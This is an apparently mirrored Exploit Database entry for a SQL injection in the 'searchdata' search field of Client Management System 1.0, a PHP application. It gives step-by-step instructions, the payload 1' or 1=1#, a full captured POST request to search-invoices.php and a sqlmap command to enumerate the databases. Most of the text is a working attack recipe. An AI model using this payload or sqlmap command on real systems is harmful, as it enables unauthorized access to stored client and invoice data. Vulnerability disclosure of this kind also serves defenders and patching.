Client Management System 1.0 – ‘searchdata’ SQL injection

• Exploit Database
• 34 阅读

• 作者： Serkan Sancar
  日期： 2020-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48956/

• # Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
  # Date: 26/10/2020
  # Exploit Author: Serkan Sancar
  # Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
  # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
  # Version: 1.0
  # Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
  
  Step 1: Open the URL http://localhost/clientms/client/index.php
  
  Step 2: Login to client user on panel
  
  Step 3: use check sql injection payload 1' or 1=1# in searchbox field
  
  Malicious Request on burp suite
  
  POST /clientms/client/search-invoices.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/clientms/client/search-invoices.php
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 210
  Origin: http://localhost
  Connection: close
  Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
  Upgrade-Insecure-Requests: 1
  
  searchdata=1%27+or+1%3D1%23&search=
  
  Step 4: You will list all invoices and you will had checked sql injection on The Panel.
  
  Example other method:
  you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter.
  sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs